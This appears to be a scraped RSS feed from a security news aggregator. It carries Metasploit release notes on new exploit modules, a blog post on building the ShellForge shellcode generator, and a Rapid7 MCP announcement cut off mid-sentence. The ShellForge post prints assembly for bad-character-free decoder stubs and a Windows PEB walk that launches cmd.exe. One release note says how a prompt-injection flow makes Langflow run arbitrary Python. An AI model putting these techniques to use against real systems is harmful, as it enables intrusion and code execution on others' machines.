<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[... <b>Hacking</b> &amp; Metasploit (7 E-Learning. E-Learning: Exklusiv: IT-Security Komplettpaket: Ethical <b>Hacking</b> &amp; Metasploit (7 E-Learning Kurse im Paket) · zum ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Webbrowser: Klartext-Passwörter im Speicher von Microsoft Edge entdeckt - Golem.de]]></title>
<description><![CDATA[... IT-Security Komplettpaket: Ethical Hacking & Metasploit (7 E-Learning. E-Learning: Exklusiv: IT-Security Komplettpaket: Ethical Hacking ...]]></description>
<link>https://tsecurity.de/de/3491894/it-security-nachrichten/webbrowser-klartext-passwoerter-im-speicher-von-microsoft-edge-entdeckt-golemde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3491894/it-security-nachrichten/webbrowser-klartext-passwoerter-im-speicher-von-microsoft-edge-entdeckt-golemde/</guid>
<pubDate>Wed, 06 May 2026 10:24:46 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[... <b>IT</b>-<b>Security</b> Komplettpaket: Ethical Hacking &amp; Metasploit (7 E-Learning. E-Learning: Exklusiv: <b>IT</b>-<b>Security</b> Komplettpaket: Ethical Hacking ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Active Directory Exploitation with Metasploit]]></title>
<description><![CDATA[The walkthrough covers thirteen distinct attack phases: AD CS template reconnaissance, LDAP enumeration, Kerberos weakness discovery, credential extraction, SAMR account manipulation, Resource-Based Constrained Delegation abuse,
The post Active Directory Exploitation with Metasploit appeared firs...]]></description>
<link>https://tsecurity.de/de/3488584/hacking/active-directory-exploitation-with-metasploit/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3488584/hacking/active-directory-exploitation-with-metasploit/</guid>
<pubDate>Tue, 05 May 2026 09:09:23 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The walkthrough covers thirteen distinct attack phases: AD CS template reconnaissance, LDAP enumeration, Kerberos weakness discovery, credential extraction, SAMR account manipulation, Resource-Based Constrained Delegation abuse,</p>
<p>The post <a href="https://www.hackingarticles.in/active-directory-exploitation-with-metasploit/">Active Directory Exploitation with Metasploit</a> appeared first on <a href="https://www.hackingarticles.in/">Hacking Articles</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Metasploit Wrap-Up 05/01/2026]]></title>
<description><![CDATA[MCP serverThis release our very own cdelafuente-r7 finished implementing the Metasploit MCP Server (msfmcpd), bringing Model Context Protocol support to Metasploit Framework. MCP lets AI applications like Claude, Cursor, or your own custom agents query Metasploit data. Think of it as a middleware...]]></description>
<link>https://tsecurity.de/de/3481236/it-security-nachrichten/metasploit-wrap-up-05012026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3481236/it-security-nachrichten/metasploit-wrap-up-05012026/</guid>
<pubDate>Fri, 01 May 2026 22:52:28 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>MCP server</h2><p>This release our very own <a href="https://github.com/cdelafuente-r7">cdelafuente-r7</a> finished implementing the Metasploit MCP Server (msfmcpd), bringing Model Context Protocol support to Metasploit Framework. MCP lets AI applications like Claude, Cursor, or your own custom agents query Metasploit data. Think of it as a middleware layer that exposes 8 standardized tools for searching modules and pulling reconnaissance data, all built on the official <a href="https://github.com/modelcontextprotocol/ruby-sdk/">Ruby MCP SDK</a>.</p><p>This first iteration is read-only, covering modules, hosts, services, vulnerabilities, and more. Tools for module execution, session interaction, and database modifications are on the roadmap for a future release. Full details are available in the <a href="https://cdelafuente-r7.github.io/metasploit-framework/docs/using-metasploit/other/how-to-use-metasploit-mcp-server.html">documentation</a>.</p><h2>Copy Fail</h2><p>Earlier this week, details of a new and high profile Linux LPE were released alongside a public PoC. The bug, nicknamed <a href="https://copy.fail/">Copy Fail</a> and identified by <a href="https://attackerkb.com/search?q=CVE-2026-31431&amp;referrer=blog">CVE-2026-31431</a>, is a logic flaw in the cryptographic APIs exposed by the Linux Kernel. Metasploit has shipped a local exploit this week to leverage the flaw on AMD64 and AARCH64 targets with additional architectures planned for future releases. The exploit, which replaces the ‘su’ binary in the page cache with a small ELF file, allows users to specify command payloads for execution and will automatically determine the appropriate target architecture.</p><h2>New module content (3)</h2><h3>Microsoft Windows HTTP to LDAP Relay</h3><p>Author: jheysel-r7</p><p>Type: Auxiliary</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21323">#21323</a> contributed by <a href="https://github.com/jheysel-r7">jheysel-r7</a></p><p>Path: server/relay/http_to_ldap</p><p>Description: This adds a new NTLM relay module that relays from HTTP to LDAP. On success, an authenticated LDAP session is opened which allows the operator to interact with the LDAP service in the context of the relayed identity.</p><h3>Copy Fail AF_ALG + authencesn Page-Cache Write</h3><p>Authors: Diego Ledda, Spencer McIntyre, Xint Code, and rootsecdev</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21395">#21395</a> contributed by <a href="https://github.com/zeroSteiner">zeroSteiner</a></p><p>Path: linux/local/cve_2026_31431_copy_fail</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2026-31431&amp;referrer=blog">CVE-2026-31431</a></p><p>Description: Adds a module for CVE-2026-31431 (The Copy Fail LPE for Linux), a local privilege escalation affecting almost every Linux Kernel since 2017.</p><h3>Linux Execute Command</h3><p>Author: Spencer McIntyre</p><p>Type: Payload (Single)</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21395">#21395</a> contributed by <a href="https://github.com/zeroSteiner">zeroSteiner</a></p><p>Path: linux/aarch64/exec</p><p>Description: Adds a module for CVE-2026-31431 (The Copy Fail LPE for Linux), a local privilege escalation affecting almost every Linux Kernel since 2017.</p><p></p><h2>Enhancements and features (5)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/21315">#21315</a> from <a href="https://github.com/cdelafuente-r7">cdelafuente-r7</a> - This adds a read-only MCP server for Metasploit capable of retrieving information from the loaded modules and database.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21352">#21352</a>, <a href="https://github.com/rapid7/metasploit-framework/pull/21353">#21353</a>, <a href="https://github.com/rapid7/metasploit-framework/pull/21355">#21355</a>, <a href="https://github.com/rapid7/metasploit-framework/pull/21359">#21359</a> from <a href="https://github.com/adfoster-r7">adfoster-r7</a> - Improves multiple module check code messages and statuses.</li></ul><h2>Bugs fixed (0)</h2><p>None</p><h2>Documentation</h2><p>You can find the latest Metasploit documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222026-04-24T18%3A36%3A28%2B01%3A00..2026-04-30T22%3A30%3A05Z%22">Pull Requests 6.4.130...6.4.131</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.130...6.4.131">Full diff 6.4.130...6.4.131</a></li></ul><p>If you are a git user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a></p><p></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[ShellForge: Building a Constraint-Aware Shellcode Generator from Scratch]]></title>
<description><![CDATA[How I built a multi-architecture shellcode synthesiser in C that outperforms msfvenom on bad-char avoidance — and what I learned about constraint-driven exploit development along the way.The Problem with Existing ToolsEvery penetration tester has been here. You have a buffer overflow. You have co...]]></description>
<link>https://tsecurity.de/de/3473290/hacking/shellforge-building-a-constraint-aware-shellcode-generator-from-scratch/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3473290/hacking/shellforge-building-a-constraint-aware-shellcode-generator-from-scratch/</guid>
<pubDate>Wed, 29 Apr 2026 07:22:39 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><em>How I built a multi-architecture shellcode synthesiser in C that outperforms msfvenom on bad-char avoidance — and what I learned about constraint-driven exploit development along the way.</em></p><h3>The Problem with Existing Tools</h3><p>Every penetration tester has been here. You have a buffer overflow. You have control of EIP. You generate a payload with msfvenom or pwntools shellcraft, pipe it through your exploit, and watch it crash — because the target environment strips \x00, or \x0a, or some other byte your shellcode happens to contain.</p><p>So you add -b "\x00\x0a\x0d" to msfvenom, it wraps your payload in an encoder, and suddenly your 26-byte execve shell is 250 bytes with a Shikata Ga Nai decoder stub bolted to the front. You didn't design around the constraints — you generated something and then tried to fix it.</p><p>This is the template problem. Every major shellcode tool today works the same way: maintain a library of pre-written shellcode templates, apply encoding wrappers after the fact, hope the decoder stub itself doesn’t contain your bad chars.</p><p><strong>ShellForge takes a different approach.</strong> Instead of generating first and encoding second, it treats constraints as inputs to the synthesis process. The question isn’t “how do I encode this payload to avoid bad chars?” — it’s “what sequence of valid instructions satisfies this goal under these constraints?”</p><h3>What ShellForge Is</h3><p>ShellForge is a constraint-aware shellcode generator with four layers:</p><ul><li><strong>C99 core</strong> — a shared library (.so/.dll) that performs instruction-level synthesis for four architectures</li><li><strong>Python orchestration layer</strong> — a ctypes bridge + Flask REST API</li><li><strong>GPT-4o-mini annotation</strong> — plain-English explanation of generated shellcode</li><li><strong>Single-file HTML dashboard</strong> — no Node, no build step, runs in any browser</li></ul><p>It supports Linux and Windows targets across x86–64, x86–32, ARM Thumb, and MIPS BE. For each architecture it can synthesise four payload types: execve shell, reverse shell, bind shell, and arbitrary write.</p><p>The constraint model is the core innovation. Every synthesis request carries:</p><pre>arch          → target architecture<br>os            → target OS  <br>goal          → what the shellcode does<br>bad_chars     → forbidden bytes<br>null_free     → shorthand for banning \x00<br>newline_free  → shorthand for banning \x0a \x0d<br>size_budget   → maximum payload size in bytes<br>encoding      → NONE / XOR / ADD_SUB / AUTO</pre><p>The synthesiser selects instructions that satisfy these constraints from the start — not after.</p><h3>Architecture: Why a Shared Library?</h3><p>The C core compiles to a shared library called via Python ctypes — not a subprocess. This is a deliberate design choice.</p><p>When you call msfvenom from Python, you’re paying subprocess overhead on every call. Importing pwntools costs ~1.2 seconds in Python startup time before a single byte of shellcode is generated. ShellForge loads the library once and calls sf_synthesize() as a direct function call. The result: synthesis in <strong>under 0.1ms</strong> per payload.</p><p>The ctypes bridge mirrors every C struct exactly:</p><pre>class _Constraints(ctypes.Structure):<br>    _fields_ = [<br>        ("arch",           ctypes.c_int),<br>        ("os",             ctypes.c_int),<br>        ("goal",           ctypes.c_int),<br>        ("bad_chars",      ctypes.c_uint8 * 256),<br>        ("bad_char_count", ctypes.c_size_t),<br>        ("size_budget",    ctypes.c_size_t),<br>        ("null_free",      ctypes.c_int),<br>        ...<br>    ]</pre><p>No serialisation, no IPC, no parsing. Python hands a struct pointer directly to C memory.</p><h3>The Encoding Problem: REX-Free Decoder Stubs</h3><p>The hardest engineering problem in ShellForge wasn’t writing the shellcode — it was writing the <strong>decoder stub</strong>.</p><p>When a payload contains bad chars, ShellForge encodes it with XOR or ADD/SUB and prepends a self-decoding stub. But here’s the catch that most tools miss: <strong>the decoder stub itself can also contain bad chars.</strong></p><p>If \x48 (the x86-64 REX.W prefix) is a bad char — which it often is in real exploits — then standard XOR decoder stubs break immediately because they're full of mov rbx, rsi and inc rsi instructions, both of which use \x48.</p><p>ShellForge’s solution is a REX-free stub that avoids the REX prefix entirely:</p><pre>; Standard approach (broken when \x48 is bad):<br>mov rbx, rsi       ; 0x48 0x89 0xf3  ← \x48 = bad char!<br>inc rsi            ; 0x48 0xff 0xc6  ← \x48 again</pre><pre>; ShellForge REX-free approach:<br>push rsi           ; 0x56  ← no REX<br>pop  rbx           ; 0x5b  ← no REX (= mov rbx,rsi without REX.W)<br>inc  esi           ; 0xff 0xc6  ← 32-bit, zero-extends to rsi</pre><p>The stub is 23 bytes and contains no \x48 bytes. The encoder iterates keys 1–255, encodes the payload, patches the key and length into the stub, then verifies the <strong>entire output</strong> — stub plus encoded payload — is clean before returning.</p><pre>/* Patch stub BEFORE clean check (placeholders are 0x00) */<br>stub[XOR_LEN_OFF] = (uint8_t)olen;<br>stub[XOR_KEY_OFF] = (uint8_t)key;<br>if (!sf_buffer_clean(c, stub, XOR_STUB_LEN)) continue;</pre><p>This order matters. Checking cleanness before patching means the \x00 placeholder bytes would fail the null-free check before we've even inserted the real key.</p><h3>Windows: PEB Walking Without Hardcoded Addresses</h3><p>The Windows synthesiser uses a technique called <strong>PEB walking with ROR13 hashing</strong> — the same approach used by Metasploit’s Windows stagers.</p><p>The challenge on Windows is that you can’t call WinExec directly in position-independent shellcode. You don't know where kernel32.dll is loaded at runtime (ASLR). Instead, you find it dynamically by walking the Process Environment Block:</p><pre>mov  rax, gs:[0x60]        ; PEB pointer (always at GS:0x60 on x64)<br>mov  rax, [rax+0x18]       ; PEB_LDR_DATA<br>mov  rax, [rax+0x20]       ; InMemoryOrderModuleList.Flink<br>mov  rax, [rax]            ; skip ntdll (first entry)<br>mov  rax, [rax]            ; kernel32 (second entry)<br>mov  rbx, [rax+0x20]       ; DllBase = kernel32 base address</pre><p>Once you have the base address of kernel32.dll, you walk its export table and find WinExec using a ROR13 hash comparison — rotating each character of the function name right by 13 bits and accumulating. The pre-computed hash for WinExec is 0x98FE8A0E.</p><pre>; ROR13 hash loop<br>movzx edi, byte [rsi]     ; load character<br>test  dil, dil            ; null terminator?<br>jz    hash_done<br>ror   edx, 13             ; rotate hash right 13<br>add   edx, edi            ; accumulate character<br>inc   rsi<br>jmp   hash_loop</pre><pre>hash_done:<br>cmp   edx, 0x98FE8A0E     ; WinExec hash?<br>jne   next_name</pre><p>This was execution-verified on Windows 10 x64 — the shellcode runs, walks the PEB, resolves WinExec, and spawns cmd.exe.</p><h3>Benchmark Results</h3><p>I ran ShellForge against pwntools across 10 constraint profiles ranging from unconstrained to highly restricted bad-char sets. msfvenom results are included from manual runs (it requires Metasploit Framework).</p><pre>Profile                                    ShellForge         pwntools              Winner<br>─────────────────────────────────────────────────────────────────────────────────────────<br>x86-64 execve, no constraints              ✅ 26B  0.1ms      ✅ 48B  1877ms        SF (size + speed)<br>x86-64 execve, null-free                   ✅ 26B  0.1ms      ✅ 48B  1204ms        SF (size + speed)<br>x86-64 execve, bad chars 00,0a,0d          ✅ 26B  0.1ms      ✅ 48B  1221ms        SF (size + speed)<br>x86-64 execve, bad chars 00,0a,0d,20,2f    ✅ 49B  0.1ms      ✅ 48B  DIRTY ❌      SF (clean output) ⭐<br>x86-64 reverse shell, null-free            ✅ 120B 0.1ms      ✅ 118B 1177ms        Tie<br>x86-32 execve, null-free                   ✅ 24B  0.1ms      ✅ 44B  1126ms        SF (size + speed)<br>x86-32 execve, bad chars 00,0a,0d,ff       ✅ 24B  0.1ms      ✅ 44B  1157ms        SF (size + speed)<br>ARM    execve, bad chars 0a,0d,20          ✅ 22B  0.2ms      ✅ varies             SF (size)<br>MIPS   execve, bad chars 0a,0d,20          ✅ 60B  0.2ms      ✅ varies             SF (speed)<br>x86-64 execve, size budget 60B             ✅ 26B  0.1ms      ✅ 48B  1161ms        SF (fits budget)<br>─────────────────────────────────────────────────────────────────────────────────────────<br>Summary   ShellForge: 8/10 success  8/10 clean  avg 40B  avg 0.1ms<br>          pwntools:   8/10 success  7/10 clean  avg 56B  avg 1300ms</pre><p><strong>Summary:</strong></p><ul><li>ShellForge: 8/10 success, 8/10 clean, avg 40B, avg <strong>0.1ms</strong></li><li>pwntools: 8/10 success, <strong>7/10 clean</strong>, avg 56B, avg <strong>1300ms</strong></li></ul><p>The headline finding is <strong>P04</strong>: under bad chars \x00\x0a\x0d\x20\x2f, pwntools produces a payload that contains forbidden bytes — it doesn't verify its own output. ShellForge produces a verified-lean 49-byte XOR-encoded payload.</p><p>Speed is a secondary finding but worth noting: ShellForge is ~13,000x faster per synthesis call. For fuzzing or automated exploit development workflows where you’re generating thousands of payloads, this matters.</p><h3>Known Limitations</h3><p><strong>ARM/MIPS null-free synthesis is not currently supported.</strong> The svc #0 instruction in ARM Thumb mode is \x00\xdf — the first byte is a null. There's no alternative encoding that avoids this at the instruction level. A path forward exists using bkpt-based syscall invocation or interwork stubs, but this is deferred as future work.</p><p><strong>Windows reverse/bind shell is not implemented.</strong> The Windows synthesiser currently handles WinExec and arbitrary write. Reverse shell requires resolving WSAStartup, WSASocketA, and connect from ws2_32.dll — a multi-library PEB walk that's architecturally straightforward but not yet in the codebase.</p><h3>What I Learned</h3><p>Building ShellForge taught me things that reading about shellcode development never could.</p><p>The constraint-ordering bug — checking stub cleanness before patching in the key — cost me two hours of debugging. The fix was three lines. But understanding <em>why</em> the order matters requires understanding that \x00 placeholder bytes in the stub template will fail a null-free check before you've had a chance to replace them with real values.</p><p>The REX prefix problem is the kind of thing that doesn’t appear in any tutorial. You learn it when your encoder works perfectly in testing and then silently fails the moment someone adds \x48 to their bad char list.</p><p>The Windows PEB walk is genuinely elegant engineering. The fact that every Windows process exposes its loaded module list through a predictable structure at a fixed offset from GS — and that you can walk it without any API calls — is one of those design decisions that was probably not intended as a feature for shellcode authors, but became one anyway.</p><h3>The Code</h3><p>ShellForge is open source on GitHub: <strong>[github.com/userIssa/shellforge]</strong></p><p>The stack:</p><ul><li>C99 core (libshellforge.so) — constraint model, synthesisers, encoders</li><li>Python bridge (shellforge_bridge.py) — ctypes interface</li><li>Flask REST API (app.py) — /synthesize, /annotate, /arches</li><li>GPT-4o-mini annotation — plain-English shellcode explanation</li><li>Single-file HTML dashboard — no Node required</li></ul><p>To run it:</p><pre>git clone https://github.com/userIssa/shellforge<br>cd shellforge/core &amp;&amp; bash build.sh<br>pip install flask flask-cors openai<br>OPENAI_API_KEY=your_key python python/api/app.py<br># open frontend/dashboard.html in your browser</pre><p><em>If this was useful, connect with me on </em><a href="http://linkedin.com/in/toluwanimi-oderinde/"><em>LinkedIn</em></a></p><p><em>#CyberSecurity #PenetrationTesting #ExploitDevelopment #Shellcode #InfoSec #RedTeam #CEH</em></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/956/1*e6-Ab0iTntvk_gPy0MTkCg.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/950/1*c_xiP3Ao7hYObNyHJpyjDw.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/954/1*i6VihmDjVI9auC7WBVlPoQ.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*LG7M5kkMFCB68ra7MaQ3Zw.png"></figure><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=f57eaea15c78" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/shellforge-building-a-constraint-aware-shellcode-generator-from-scratch-f57eaea15c78">ShellForge: Building a Constraint-Aware Shellcode Generator from Scratch</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Metasploit Wrap-Up 04/25/2026]]></title>
<description><![CDATA[Check Method VisibilityMetasploit has supported check methods for many years now. It’s not always desirable to jump straight into exploiting a vulnerability but instead to determine if the target is vulnerable. Metasploit tries to be very conservative with classifying a target as “vulnerable” unl...]]></description>
<link>https://tsecurity.de/de/3462698/it-security-nachrichten/metasploit-wrap-up-04252026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3462698/it-security-nachrichten/metasploit-wrap-up-04252026/</guid>
<pubDate>Fri, 24 Apr 2026 22:50:21 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>Check Method Visibility</h2><p>Metasploit has supported check methods for many years now. It’s not always desirable to jump straight into exploiting a vulnerability but instead to determine if the target is vulnerable. Metasploit tries to be very conservative with classifying a target as “vulnerable” unless the vulnerability is leveraged as part of the check method, reserving the “appears” status for version checks. The different check codes a module is capable of returning and the logic to select among them varies from exploit to exploit and is not always the easiest to understand. Aligning with the consistent feedback that Metasploit has received that module actions should be more transparent, <a href="https://github.com/adfoster-r7">adfoster-r7</a> has been adding reasoning information en masse to the check codes returned by a variety of exploits. This information will help users understand why a particular vulnerability status was determined, making troubleshooting efforts easier and increasing confidence in the results.</p><h2>Legacy SMB Improvements</h2><p>This week, community member <a href="https://github.com/g0tm1lk">g0tm1lk</a> made multiple improvements for legacy and non-Windows SMB targets. Version information is now more reliably extracted from targets running SMB 1, and a variety of minor bugs were fixed across multiple modules that would have affected users targeting systems the module was not intended to target as is often the case when the module is used to scan an entire network.</p><h2>New module content (4)</h2><h3>Camaleon CMS Directory Traversal CVE-2024-46987</h3><p>Authors: Goultarde, Peter Stockli, and bootstrapbool</p><p>Type: Auxiliary</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21122">#21122</a> contributed by <a href="https://github.com/bootstrapbool">bootstrapbool</a></p><p>Path: gather/camaleon_download_private_file</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2024-46987&amp;referrer=blog">CVE-2024-46987</a></p><p>Description: This adds an auxiliary module to exploit an arbitrary file vulnerability, CVE-2024-46987, on Camaleon CMS &gt;= 2.8.0 as well as 2.9.0.</p><h3>Langflow RCE</h3><p>Authors: Takahiro Yokoyama and weblover12</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21260">#21260</a> contributed by <a href="https://github.com/Takahiro-Yoko">Takahiro-Yoko</a></p><p>Path: multi/http/langflow_rce_cve_2026_27966</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2026-27966&amp;referrer=blog">CVE-2026-27966</a></p><p>Description: Adds exploit module for CVE-2026-27966, a prompt injection RCE vulnerability in Langflow &lt; 1.8.0. By creating and sending a specially-crafted flow containing python code, the LangChain will execute that code because LangChain's Read-Eval-Print Loop (REPL) is exposed by default and runs any Python code it is given.</p><h3>WebDAV PHP Upload</h3><p>Authors: g0tmi1k and theLightCosine <a href="mailto:theLightCosine@metasploit.com">theLightCosine@metasploit.com</a></p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21256">#21256</a> contributed by <a href="https://github.com/g0tmi1k">g0tmi1k</a></p><p>Path: multi/http/webdav_upload_php</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2012-10062&amp;referrer=blog">CVE-2012-10062</a></p><p>Description: Updates code and adds features: Linux support, check() method, and cleanup after exploit.</p><h3>Linux Chmod</h3><p>Author: bcoles <a href="mailto:bcoles@gmail.com">bcoles@gmail.com</a></p><p>Type: Payload (Single)</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21238">#21238</a> contributed by <a href="https://github.com/bcoles">bcoles</a></p><p>Path: linux/loongarch64/chmod</p><p>Description: Adds a new linux/loongarch64/chmod payload to change the permissions of a specified file.</p><h2>Enhancements and features (11)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/21019">#21019</a> from <a href="https://github.com/g0tmi1k">g0tmi1k</a> - This adds support for phpMyAdmin v3.1.x to the phpMyAdmin Config File Code Injection module (CVE-2009-1285). This also adds a check method.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21230">#21230</a> from <a href="https://github.com/bcoles">bcoles</a> - Reduces the memory footprint of the module metadata cache in Metasploit.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21231">#21231</a> from <a href="https://github.com/bcoles">bcoles</a> - Improves the performance of the module metadata cache as well as bug fixes.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21232">#21232</a> from <a href="https://github.com/bcoles">bcoles</a> - Add a method to discover writable directories on Unix targets using the find command.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21256">#21256</a> from <a href="https://github.com/g0tmi1k">g0tmi1k</a> - Updates code and adds features: Linux support, check() method, and cleanup after exploit.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21347">#21347</a></li></ul><h2>Bugs fixed (4)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/21327">#21327</a> from <a href="https://github.com/tair-m">tair-m</a> - Fixes a crash when loading HTTP modules.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21341">#21341</a> from <a href="https://github.com/g0tmi1k">g0tmi1k</a> - This fixes multiple issues related to various SMB modules when targeting Samba.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21344">#21344</a> from <a href="https://github.com/adfoster-r7">adfoster-r7</a> - Fixes a bug when running the check method for scanner/http/elasticsearch_traversal against non-vulnerable targets.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21346">#21346</a> from <a href="https://github.com/adfoster-r7">adfoster-r7</a> - Fixes a false positive that was present in auxiliary/scanner/couchdb/couchdb_enum.</li></ul><h2>Documentation</h2><p>You can find the latest Metasploit documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222026-04-16T14%3A22%3A51%2B01%3A00..2026-04-23T14%3A54%3A17Z%22">Pull Requests 6.4.128...6.4.129</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.128...6.4.129">Full diff 6.4.128...6.4.129</a></li></ul><p>If you are a git user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a></p><p></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[From Bulk Export to AI-ready Security Workflows: Introducing Rapid7’s Open-Source MCP Server and Agent Skill]]></title>
<description><![CDATA[A new open-source bridge helps customers connect Rapid7 vulnerability data to AI agents, assistants and custom workflows with more flexibility, control, and faster access to insight.Security teams want more from their data than APIs and one-off reports.They want to ask better questions, move fast...]]></description>
<link>https://tsecurity.de/de/3451540/it-security-nachrichten/from-bulk-export-to-ai-ready-security-workflows-introducing-rapid7s-open-source-mcp-server-and-agent-skill/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3451540/it-security-nachrichten/from-bulk-export-to-ai-ready-security-workflows-introducing-rapid7s-open-source-mcp-server-and-agent-skill/</guid>
<pubDate>Tue, 21 Apr 2026 14:55:16 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h4><span><em>A new open-source bridge helps customers connect Rapid7 vulnerability data to AI agents, assistants and custom workflows with more flexibility, control, and faster access to insight.</em></span></h4><p><span>Security teams want more from their data than APIs and one-off reports.</span></p><p><span>They want to ask better questions, move faster, and bring security context into the workflows they are already building. That’s especially true as more organizations experiment with private AI assistants, internal copilots, and LLM-powered automation. Part of this experimentation is, of course, attempting to lower the pressure on teams that have to figure out how to prioritize the sheer number of actionable vulnerabilities efforts like Project Glasswing are quickly becoming hyper-skilled at spotting.     </span></p><p><span>That’s why Rapid7 is introducing a free, open-source MCP Server and Agent Skill for Bulk Export. Bulk export is a highly efficient way to access all your Rapid7 data; no more paging APIs, no more verbose output. Bulk Export creates a local offline replica of your data the LLM can efficiently and quickly interrogate, reducing token cost and time to answer questions.</span></p><p><span>This new MCP and Agent Skill gives customers a standardized way to connect Rapid7 vulnerability and exposure data to AI assistants and custom AI workflows. Built as an open-source bridge, it helps customers bring their Rapid7 data into the tools and experiences that work best for their teams.</span></p><p><span></span></p><figure><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltad3c1d6f92a4d9dc/69e76b60e08626060d013746/image3.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="image3.png" asset-alt="image3.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltad3c1d6f92a4d9dc/69e76b60e08626060d013746/image3.png" data-sys-asset-uid="bltad3c1d6f92a4d9dc" data-sys-asset-filename="image3.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="image3.png" sys-style-type="display"></figure><p><span></span></p><h2>Why this matters now</h2><p><span>Security teams are no longer just buying tools. They’re connecting systems, shaping workflows, and testing how AI can help analysts, IT teams, and leaders get to answers faster. For many teams, the path from raw security data to usable AI context is still manual. It often means exporting data, building wrappers, shaping queries, and managing custom integrations.</span></p><p><span>Rather than leave every team to solve that challenge from scratch, we wanted to provide a stronger foundation that is flexible, practical, and easy to extend over time. With projects like Metasploit and Velociraptor, Rapid7 is committed to Open Source, and by sharing with the broader community we hope to accelerate velocity and ensure we’re able to incorporate more use cases and fixes. These processes also give customers full visibility of the code running and tools used, ensuring data privacy and allowing the user to do with their data what they please.  </span></p><h2>What MCP does</h2><p><a href="https://www.rapid7.com/fundamentals/model-context-protocol-mcp/" target="_blank"><span>Model Context Protocol</span></a><span>, or MCP, is an emerging standard for helping AI systems interact with external data and tools in a structured way.</span></p><p><span>In practical terms, it gives AI assistants a cleaner way to ask questions, retrieve data, and work with systems beyond the model itself. For customers, that means less custom glue code and a more consistent way to use security telemetry in AI-driven workflows.</span></p><p><span>That matters because many security reporting and analysis workflows still assume a high technical bar. Answering a simple question can require custom queries, SQL knowledge, or 